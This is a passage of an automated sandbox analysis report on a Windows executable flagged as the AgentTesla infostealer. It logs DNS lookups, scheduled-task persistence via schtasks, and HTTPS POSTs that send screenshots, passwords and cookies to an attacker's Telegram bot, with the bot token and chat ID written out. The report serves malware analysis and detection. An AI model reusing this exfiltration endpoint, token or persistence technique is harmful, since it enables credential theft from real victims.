                                                          May 13, 2022 14:35:16.058563948 CEST6457953192.168.2.68.8.8.8
                                                          May 13, 2022 14:35:16.078174114 CEST53645798.8.8.8192.168.2.6
                                                          May 13, 2022 14:35:22.701349974 CEST5880153192.168.2.68.8.8.8
                                                          May 13, 2022 14:35:22.720519066 CEST53588018.8.8.8192.168.2.6
                                                          May 13, 2022 14:35:23.955631971 CEST5902853192.168.2.68.8.8.8
                                                          May 13, 2022 14:35:23.975550890 CEST53590288.8.8.8192.168.2.6
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          May 13, 2022 14:35:13.999356031 CEST192.168.2.68.8.8.80x27fbStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                          May 13, 2022 14:35:16.022170067 CEST192.168.2.68.8.8.80xbb1Standard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                                          May 13, 2022 14:35:16.058563948 CEST192.168.2.68.8.8.80xc557Standard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                                          May 13, 2022 14:35:22.701349974 CEST192.168.2.68.8.8.80x7584Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                          May 13, 2022 14:35:23.955631971 CEST192.168.2.68.8.8.80x3812Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          May 13, 2022 14:35:14.018157959 CEST8.8.8.8192.168.2.60x27fbNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                          May 13, 2022 14:35:16.042714119 CEST8.8.8.8192.168.2.60xbb1No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)
                                                          May 13, 2022 14:35:16.042714119 CEST8.8.8.8192.168.2.60xbb1No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)
                                                          May 13, 2022 14:35:16.042714119 CEST8.8.8.8192.168.2.60xbb1No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)
                                                          May 13, 2022 14:35:16.042714119 CEST8.8.8.8192.168.2.60xbb1No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)
                                                          May 13, 2022 14:35:16.042714119 CEST8.8.8.8192.168.2.60xbb1No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)
                                                          May 13, 2022 14:35:16.078174114 CEST8.8.8.8192.168.2.60xc557No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)
                                                          May 13, 2022 14:35:16.078174114 CEST8.8.8.8192.168.2.60xc557No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)
                                                          May 13, 2022 14:35:16.078174114 CEST8.8.8.8192.168.2.60xc557No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)
                                                          May 13, 2022 14:35:16.078174114 CEST8.8.8.8192.168.2.60xc557No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)
                                                          May 13, 2022 14:35:16.078174114 CEST8.8.8.8192.168.2.60xc557No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)
                                                          May 13, 2022 14:35:22.720519066 CEST8.8.8.8192.168.2.60x7584No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                          May 13, 2022 14:35:23.975550890 CEST8.8.8.8192.168.2.60x3812No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                          • api.telegram.org
                                                          • api.ipify.org
                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.649848149.154.167.220443C:\Users\user\Desktop\e3.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-05-13 12:35:16 UTC0OUTPOST /bot1341301202:AAHzCj-Eu3mWY1PQc6gP-IXoYKSfMPo3X2w/sendDocument HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=---------------------------8da35006fbb73ac
                                                          Host: api.telegram.org
                                                          Content-Length: 68743
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          2022-05-13 12:35:16 UTC0INHTTP/1.1 100 Continue
                                                          2022-05-13 12:35:16 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 30 30 36 66 62 62 37 33 61 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 39 39 35 30 37 30 35 37 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 30 30 36 66 62 62 37 33 61 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 63 72 65 65 6e 73 68 6f 74 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 2f 39 38
                                                          Data Ascii: -----------------------------8da35006fbb73acContent-Disposition: form-data; name="chat_id"1299507057-----------------------------8da35006fbb73acContent-Disposition: form-data; name="caption"New Screenshot Recovered!User Name: user/98
                                                          2022-05-13 12:35:16 UTC1OUTData Raw: f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 e2 68 a5 c5 15 d2 60 14 55 cb 6d 2e ea e6 35 95 54 24 4c 70 24 73 80 7e 9d cf e0 2a fc 3a 3d ba 73 34 8f 29 f4 5f 95 7f c4 fe 94 ae 87 63 12 96 ba 43 a6 58 c8 98 fb 39 8f de 37 39 fd 73 54 e6 d0 5f ad b4 ea ff 00 ec c9 f2 1f f0 fd 45 1c c8 4d 33 1e 8a 9e e2 ce e2 d4 8f 3e 17 40 7a 12 38 3f 43 d0 d4 35 42 12 8a 28 a0 04 a2 8a 29 0c 4a 4a ec a4 f0 1b 21 c1 d4 78
                                                          Data Ascii: &'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?h`Um.5T$Lp$s~*:=s4)_cCX979sT_EM3>@z8?C5B()JJ!x
                                                          2022-05-13 12:35:16 UTC17OUTData Raw: a9 01 a5 cd 3b 26 2b b2 0d 84 76 a4 c5 59 e0 d0 50 1a 5c 83 e7 2b 52 d4 c6 21 4d 31 11 4b 95 8f 99 11 e2 97 14 ed 84 76 a3 14 58 2e 37 14 b8 a5 c5 18 a0 04 c5 14 b4 b8 a6 21 28 a5 c5 18 a0 04 c5 2e 29 71 46 29 d8 42 62 8c 53 b1 46 28 b0 5c 6e 29 31 52 62 93 14 58 2e 33 14 98 a9 31 49 8a 2c 3b 91 e2 90 8a 93 14 84 52 b0 ee 45 8a 31 52 62 90 8a 9b 0e e4 44 53 48 a9 8a d3 4a d4 d8 a4 c8 88 a4 22 a5 2b 4d 2b 53 62 93 22 22 93 15 21 14 dc 54 b4 55 c6 62 9b 8a 90 8a 42 2a 6c 55 c6 51 4b 8a 4a 43 12 8a 5a 4a 43 12 8a 5a 28 01 28 a5 a2 81 89 45 2e 28 a0 44 35 b1 a3 41 05 c6 9d 7d 14 b1 a1 92 47 8a 38 a4 23 94 62 1c 8c 1e d9 20 03 f5 ac 9d a2 9e 24 95 61 78 52 4d b1 c8 ca cc 00 ea 57 38 39 fc 4d 65 24 da b2 35 8b 49 9b 96 76 51 8d 32 2b 63 1c 6b 7a f7 50 16 91 e3
                                                          Data Ascii: ;&+vYP\+R!M1KvX.7!(.)qF)BbSF(\n)1RbX.31I,;RE1RbDSHJ"+M+Sb""!TUbB*lUQKJCZJCZ((E.(D5A}G8#b $axRMW89Me$5IvQ2+ckzP
                                                          2022-05-13 12:35:16 UTC33OUTData Raw: 9d 22 ec c1 70 32 3f 85 c0 e1 85 7a a2 6a 56 57 f1 c9 0d b5 ca 34 8e a4 05 39 52 78 f7 aa 9a d6 9c da 8d 84 89 75 6f 16 d5 52 c1 84 87 2b 81 d4 7c b4 ef 28 bb 48 49 46 4a f1 3c a2 8c d2 51 9a d0 81 68 cd 14 94 00 b9 ad ff 00 0f f8 66 4d 76 d6 59 a3 ba 58 7c b7 da 43 21 39 e3 35 cf d7 a1 fc 37 ff 00 90 65 e7 fd 76 1f fa 0d 4c 9b 48 a8 ab b2 8f fc 2b db 9f fa 08 45 ff 00 7e cf f8 d1 ff 00 0a fa e7 fe 82 11 7f df 06 bb 4f ed 2b 1f f9 fd b6 ff 00 bf ab fe 34 7f 69 58 ff 00 cf ed b7 fd fd 5f f1 a9 f7 c7 ee 1e 71 ac 78 56 ef 4b b7 69 96 41 70 91 b6 1f 62 e3 6f 00 e7 f5 ae 7f 71 f5 af 5e 37 31 cd 3c 91 c1 2d a4 e2 53 90 be 78 c9 f9 40 3c 00 7d 2b ce 3c 53 61 1e 9f ac bc 31 20 8c 32 87 2a 0e 40 27 d2 aa 32 7b 32 5a 5b a3 23 26 8c d2 51 57 72 45 c9 a3 27 d6 92 96
                                                          Data Ascii: "p2?zjVW49RxuoR+|(HIFJ<QhfMvYX|C!957evLH+E~O+4iX_qxVKiApboq^71<-Sx@<}+<Sa1 2*@'2{2Z[#&QWrE'
                                                          2022-05-13 12:35:16 UTC49OUTData Raw: a0 41 4b 49 4b 4c 00 52 d2 0a 5a 62 16 8a 4a 5a 04 2d 14 94 b4 c4 14 b4 94 b4 c0 5a 29 29 68 10 b4 52 51 4c 05 cd 19 a4 a2 80 17 34 66 92 8a 04 3b 34 b9 a6 d1 4c 07 66 8c d3 68 a2 e2 1d 9a 5c d3 68 a2 e1 61 d9 a3 34 dc d1 9a 77 0b 0f cd 14 cd d4 6e a2 e1 62 4c d2 66 99 9a 32 68 b8 58 7e 68 dd 4c a2 8b 8a c3 f7 51 ba 99 4b 45 c7 61 d9 34 66 90 51 40 85 a2 92 8a 60 2d 14 94 50 03 a8 a4 a2 81 0e a2 92 8a 60 3b 34 b4 da 5a 62 16 81 49 4a 28 10 b4 b4 da 5a 62 16 96 90 52 d3 10 b4 52 52 d3 10 ea 50 69 a2 96 98 85 a7 0a 6d 38 55 09 8b 4b 49 4b 4c 90 a5 a4 a5 a6 21 68 a4 a5 a6 02 d2 51 45 02 16 96 90 52 d0 20 a5 a2 8a 60 2d 14 94 b4 08 5a 5a 6d 2d 02 16 96 92 8a 04 2d 2d 25 14 c4 2d 2d 25 02 80 1c 29 45 36 94 50 48 fa 5a 68 a5 cd 31 0b 4b 4d c8 a3 75 02 b0 fa 5c
                                                          Data Ascii: AKIKLRZbJZ-Z))hRQL4f;4Lfh\ha4wnbLf2hX~hLQKEa4fQ@`-P`;4ZbIJ(ZbRRRPim8UKIKL!hQER `-ZZm---%--%)E6PHZh1KMu\
                                                          2022-05-13 12:35:16 UTC64OUTData Raw: d6 45 b8 82 e6 ed 74 e9 44 af 24 9e 78 f9 5a 49 31 b9 5b ae 15 7b f1 9a e4 e9 00 51 45 14 c0 2a f5 95 9c 6e 9e 75 c3 61 09 c2 af 76 aa 35 ab a5 0f 31 5a 49 39 f2 c6 d5 1e 83 bd 6d 42 2a 53 b3 30 af 27 18 5d 12 22 69 d3 bf 94 aa 37 7d 08 aa 17 f6 66 d6 41 83 94 6e 84 ff 00 2a b8 8f a5 c6 e1 d0 e1 94 e4 1f 9a 99 a9 dd 41 71 02 ac 4f b9 83 67 a1 1c 60 d7 45 45 07 07 76 af e4 73 d3 73 55 15 93 b7 99 99 45 14 57 09 de 15 da e8 fe 0d b2 bd d3 6d ee 67 96 e4 34 b1 86 f9 19 71 cf d4 57 15 5e ab a2 dc 2d b7 86 ac 1d c1 23 ca 51 81 f4 ac 2b 73 68 a1 b9 51 71 57 72 d8 c0 b8 f0 00 69 33 6d 7a 51 31 d2 55 dc 7f 31 8a a1 aa 78 32 6d 37 4e 9a f0 de 47 20 88 64 a8 42 33 ce 3d 6b b5 fe d7 87 fe 79 bf e9 55 3c 45 3a dc f8 5a f5 d0 10 36 e3 9f a8 a8 b5 78 5b 9f 61 2a 94 a6
                                                          Data Ascii: EtD$xZI1[{QE*nuav51ZI9mB*S0']"i7}fAn*AqOg`EEvssUEWmg4qW^-#Q+shQqWri3mzQ1U1x2m7NG dB3=kyU<E:Z6x[a*
                                                          2022-05-13 12:35:16 UTC67OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 30 30 36 66 62 62 37 33 61 63 2d 2d 0d 0a
                                                          Data Ascii: -----------------------------8da35006fbb73ac--
                                                          2022-05-13 12:35:16 UTC67INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0
                                                          Date: Fri, 13 May 2022 12:35:16 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 828
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                          {"ok":true,"result":{"message_id":5790,"from":{"id":1341301202,"is_bot":true,"first_name":"MYORIGINLOGGER_BOT","username":"MYORIGINLOGS_BOT"},"chat":{"id":1299507057,"first_name":"Yungboi","username":"yungboi101","type":"private"},"date":1652445316,"document":{"file_name":"user-980108 2022-05-13 04-46-47.jpeg","mime_type":"image/jpeg","thumb":{"file_id":"AAMCAgADGQMAAhaeYn5QhHfrrrxFj1IyjFSStsF17EYAAisYAAIO6PFLVDzIF4T6a8oBAAdtAAMkBA","file_unique_id":"AQADKxgAAg7o8Uty","file_size":15794,"width":320,"height":256},"file_id":"BQACAgIAAxkDAAIWnmJ-UIR36668RY9SMoxUkrbBdexGAAIrGAACDujxS1Q8yBeE-mvKJAQ","file_unique_id":"AgADKxgAAg7o8Us","file_size":68158},"caption":"New Screenshot Recovered!\n\nUser Name: user/980108\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.64984952.20.78.240443C:\Users\user\Desktop\e3.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-05-13 12:35:16 UTC67OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                          Host: api.ipify.org
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.649850149.154.167.220443C:\Users\user\Desktop\e3.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-05-13 12:35:22 UTC68OUTPOST /bot1341301202:AAHzCj-Eu3mWY1PQc6gP-IXoYKSfMPo3X2w/sendDocument HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=---------------------------8da3500fe20e7c2
                                                          Host: api.telegram.org
                                                          Content-Length: 1027
                                                          Expect: 100-continue
                                                          2022-05-13 12:35:22 UTC68INHTTP/1.1 100 Continue
                                                          2022-05-13 12:35:22 UTC69OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 30 30 66 65 32 30 65 37 63 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 39 39 35 30 37 30 35 37 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 30 30 66 65 32 30 65 37 63 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 2f 39 38 30 31 30 38 0a 4f 53 46
                                                          Data Ascii: -----------------------------8da3500fe20e7c2Content-Disposition: form-data; name="chat_id"1299507057-----------------------------8da3500fe20e7c2Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/980108OSF
                                                          2022-05-13 12:35:22 UTC70OUTData Raw: 2d 0d 0a
                                                          Data Ascii: -
                                                          2022-05-13 12:35:22 UTC70INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0
                                                          Date: Fri, 13 May 2022 12:35:22 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 637
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                          {"ok":true,"result":{"message_id":5791,"from":{"id":1341301202,"is_bot":true,"first_name":"MYORIGINLOGGER_BOT","username":"MYORIGINLOGS_BOT"},"chat":{"id":1299507057,"first_name":"Yungboi","username":"yungboi101","type":"private"},"date":1652445322,"document":{"file_name":"user-980108 2022-05-13 04-52-40.html","mime_type":"text/html","file_id":"BQACAgIAAxkDAAIWn2J-UIoV8ZgTc1bA1SIJM2ZGnLCgAAIsGAACDujxS2Lf5y13rfxeJAQ","file_unique_id":"AgADLBgAAg7o8Us","file_size":451},"caption":"New PW Recovered!\n\nUser Name: user/980108\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          3192.168.2.649851149.154.167.220443C:\Users\user\Desktop\e3.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-05-13 12:35:24 UTC71OUTPOST /bot1341301202:AAHzCj-Eu3mWY1PQc6gP-IXoYKSfMPo3X2w/sendDocument HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=---------------------------8da3501b895e279
                                                          Host: api.telegram.org
                                                          Content-Length: 1900
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          2022-05-13 12:35:24 UTC71INHTTP/1.1 100 Continue
                                                          2022-05-13 12:35:24 UTC71OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 30 31 62 38 39 35 65 32 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 39 39 35 30 37 30 35 37 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 30 31 62 38 39 35 65 32 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6f 6b 69 65 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 2f 39 38 30 31 30 38
                                                          Data Ascii: -----------------------------8da3501b895e279Content-Disposition: form-data; name="chat_id"1299507057-----------------------------8da3501b895e279Content-Disposition: form-data; name="caption"New Cookie Recovered!User Name: user/980108
                                                          2022-05-13 12:35:24 UTC72OUTData Raw: 6a a0 f3 72 71 24 12 b3 9d 31 b4 dd dd ec b2 ef 68 8d c7 6c b3 64 e9 4c b5 f5 11 96 5f a1 66 47 6c 50 e9 db 39 28 d3 e8 a5 09 8b 51 77 8e 62 d4 9d 82 96 96 56 af 2f 94 0c 0b c4 28 ec 63 fb ed fb 73 4e b3 aa 56 e2 e6 42 5a ad 2e 05 35 5e 7d a8 1b 16 ea 43 c1 a0 30 de be b0 8a f2 8c 6b 6e f4 fc 61 fd b8 39 51 77 65 a4 06 94 de bb 93 e9 ae ed c9 9a 8e 55 bb 73 67 ba af 3f 99 de 4d ef 90 77 c7 e8 c5 61 a8 a9 de 12 f1 f8 42 89 e0 72 dd 72 5b 50 e3 ee d5 dd db 37 b8 eb 3b e0 44 51 3a 46 a4 1f a5 af 9c 1b 00 00 00 00 00 00 00 fc 2b 5d 2f 8a 89 c6 85 f3 1a dd cc 17 35 6e ec cd 31 b5 ec 1e ba 98 85 f8 8d d7 78 c4 70 e3 e5 d4 5a 41 6c 6e cc e7 b5 a2 6a 73 8d 97 ec d6 f8 2a e2 ee ff a7 88 34 25 fd 22 9d f9 a7 ff 0b 00 00 00 00 00 00 00 ac 28 2c 26 84 65 4e 01 c4 d5
                                                          Data Ascii: jrq$1hldL_fGlP9(QwbV/(csNVBZ.5^}C0kna9QweUsg?MwaBrr[P7;DQ:F+]/5n1xpZAlnjs*4%"(,&eN
                                                          2022-05-13 12:35:24 UTC73INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0
                                                          Date: Fri, 13 May 2022 12:35:24 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 647
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                          {"ok":true,"result":{"message_id":5792,"from":{"id":1341301202,"is_bot":true,"first_name":"MYORIGINLOGGER_BOT","username":"MYORIGINLOGS_BOT"},"chat":{"id":1299507057,"first_name":"Yungboi","username":"yungboi101","type":"private"},"date":1652445324,"document":{"file_name":"user-980108 2022-05-13 04-57-53.zip","mime_type":"application/zip","file_id":"BQACAgIAAxkDAAIWoGJ-UIwzsEqzt9V_fUz16J-hlPVfAAItGAACDujxS_RHgM9bYYVYJAQ","file_unique_id":"AgADLRgAAg7o8Us","file_size":1315},"caption":"New Cookie Recovered!\n\nUser Name: user/980108\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:14:33:20
                                                          Start date:13/05/2022
                                                          Path:C:\Users\user\Desktop\e3.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\e3.exe"
                                                          Imagebase:0x3e0000
                                                          File size:562176 bytes
                                                          MD5 hash:E37F62C85961B9502A0D1599C37E390C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: MALWARE_Win_DLAgent05, Description: Detects an unknown dropper. Typically exisys as a DLL in base64-encoded gzip-compressed file embedded within another executable, Source: 00000000.00000002.418778941.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.416036513.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.416036513.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.419018802.0000000007170000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.413876682.0000000002871000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          Target ID:2
                                                          Start time:14:33:32
                                                          Start date:13/05/2022
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PhOyTxcSdzas" /XML "C:\Users\user\AppData\Local\Temp\tmp799E.tmp
                                                          Imagebase:0x11a0000
                                                          File size:185856 bytes
                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:3
                                                          Start time:14:33:33
                                                          Start date:13/05/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6406f0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:4
                                                          Start time:14:33:33
                                                          Start date:13/05/2022
                                                          Path:C:\Users\user\Desktop\e3.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:{path}
                                                          Imagebase:0x960000
                                                          File size:562176 bytes
                                                          MD5 hash:E37F62C85961B9502A0D1599C37E390C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.636427550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.636427550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000000.407405620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000000.407405620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000000.408635551.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000000.408635551.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000000.409431233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000000.409431233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000000.410001706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000000.410001706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.639291967.0000000002E55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                          Reputation:low

                                                          No disassembly